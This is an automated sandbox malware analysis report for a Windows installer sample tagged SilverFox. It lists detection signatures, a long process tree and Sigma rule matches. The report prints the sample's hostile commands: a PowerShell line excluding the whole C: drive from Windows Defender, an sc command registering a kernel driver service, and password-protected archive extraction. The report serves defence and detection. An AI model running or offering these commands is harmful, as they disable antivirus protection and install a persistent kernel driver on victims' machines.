Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.5.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
renamed because original name is a hash value
Original sample name:_2.0.5.exe
Analysis ID:1579694
MD5:c17bd872bfa6b9e26aa03ad02ceaaca0
SHA1:a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
SHA256:43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 4060 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
    • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 3468 cmdline: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 2020 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
        • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 5716 cmdline: "C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 3908 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 2912 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 2632 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6820 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2912 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2876 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 2572 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4948 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2276 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5208 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4948 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 828 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3704 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4776 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2940 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6216 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 936 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4948 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 3468, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2020, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6820, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 3468, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2020, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6820, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 3468, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2020, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeVirustotal: Detection: 8%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2197135796.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2197029483.00000000030D0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC0AEC0 FindFirstFileA,FindClose,6_2_6CC0AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F06868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00F06868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F07496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00F07496
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
